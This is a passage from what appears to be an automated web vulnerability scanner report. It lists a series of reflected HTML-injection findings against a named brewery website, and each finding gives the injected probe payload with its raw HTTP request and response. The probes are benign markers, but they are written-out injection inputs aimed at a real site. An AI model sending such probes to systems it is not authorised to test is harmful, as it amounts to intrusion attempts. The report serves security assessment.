This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content703df"><a>def2f74c18c/js/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content703df"><a>def2f74c18c_page" class="content703df">
...[SNIP]...

1.111. http://www.ninkasibrewing.com/content/js/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/js/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75f69"><a>6334a4eb341 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content75f69"><a>6334a4eb341/js/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content75f69"><a>6334a4eb341_page" class="content75f69">
...[SNIP]...

1.112. http://www.ninkasibrewing.com/dock_sales/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /dock_sales/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 105ab"><a>d599d76d4e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dock_sales105ab"><a>d599d76d4e6/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="dock_sales105ab"><a>d599d76d4e6_page" class="dock_sales105ab">
...[SNIP]...

1.113. http://www.ninkasibrewing.com/dock_sales/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /dock_sales/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fd31"><a>f3a63f771b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dock_sales6fd31"><a>f3a63f771b0/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="dock_sales6fd31"><a>f3a63f771b0_page" class="dock_sales6fd31">
...[SNIP]...

1.114. http://www.ninkasibrewing.com/dock_sales/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /dock_sales/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6149e"><a>8921298afbf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dock_sales6149e"><a>8921298afbf/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="dock_sales6149e"><a>8921298afbf_page" class="dock_sales6149e">
...[SNIP]...

1.115. http://www.ninkasibrewing.com/dock_sales/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /dock_sales/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1d6e"><a>dd2ead7ff0c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dock_salesa1d6e"><a>dd2ead7ff0c/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="dock_salesa1d6e"><a>dd2ead7ff0c_page" class="dock_salesa1d6e">
...[SNIP]...

1.116. http://www.ninkasibrewing.com/dock_sales/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /dock_sales/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8fe0"><a>4f3395768f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dock_salesa8fe0"><a>4f3395768f5/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="dock_salesa8fe0"><a>4f3395768f5_page" class="dock_salesa8fe0">
...[SNIP]...

1.117. http://www.ninkasibrewing.com/dock_sales/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /dock_sales/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62f54"><a>08505ab97bb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dock_sales62f54"><a>08505ab97bb/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="dock_sales62f54"><a>08505ab97bb_page" class="dock_sales62f54">
...[SNIP]...

1.118. http://www.ninkasibrewing.com/dock_sales/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /dock_sales/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d7cc"><a>edb42030abb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dock_sales2d7cc"><a>edb42030abb/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="dock_sales2d7cc"><a>edb42030abb_page" class="dock_sales2d7cc">
...[SNIP]...

1.119. http://www.ninkasibrewing.com/etc/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /etc/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac883"><a>11e27ca78ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /etcac883"><a>11e27ca78ba/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="etcac883"><a>11e27ca78ba_page" class="etcac883">
...[SNIP]...

1.120. http://www.ninkasibrewing.com/etc/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /etc/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d715"><a>980bc464eba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /etc6d715"><a>980bc464eba/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="etc6d715"><a>980bc464eba_page" class="etc6d715">
...[SNIP]...

1.121. http://www.ninkasibrewing.com/etc/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /etc/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92a18"><a>2377f254faf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /etc92a18"><a>2377f254faf/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="etc92a18"><a>2377f254faf_page" class="etc92a18">
...[SNIP]...

1.122. http://www.ninkasibrewing.com/etc/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /etc/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2e31"><a>0c94de8f97e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /etcf2e31"><a>0c94de8f97e/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="etcf2e31"><a>0c94de8f97e_page" class="etcf2e31">
...[SNIP]...

1.123. http://www.ninkasibrewing.com/etc/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /etc/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 739ca"><a>0576c1b8f9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /etc739ca"><a>0576c1b8f9a/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="etc739ca"><a>0576c1b8f9a_page" class="etc739ca">
...[SNIP]...

1.124. http://www.ninkasibrewing.com/etc/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /etc/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a787d"><a>f50a6829e24 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /etca787d"><a>f50a6829e24/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="etca787d"><a>f50a6829e24_page" class="etca787d">
...[SNIP]...

1.125. http://www.ninkasibrewing.com/etc/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /etc/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba87c"><a>6ea40b41fee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /etcba87c"><a>6ea40b41fee/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="etcba87c"><a>6ea40b41fee_page" class="etcba87c">
...[SNIP]...

1.126. http://www.ninkasibrewing.com/facebook/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c518f"><a>4156b07e886 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookc518f"><a>4156b07e886/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookc518f"><a>4156b07e886_page" class="facebookc518f">
...[SNIP]...

1.127. http://www.ninkasibrewing.com/facebook/content/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21e10"><a>2532c6c50e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook21e10"><a>2532c6c50e8/content/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook21e10"><a>2532c6c50e8_page" class="facebook21e10">
...[SNIP]...

1.128. http://www.ninkasibrewing.com/facebook/content/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8c9b"><a>1c3467f82f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

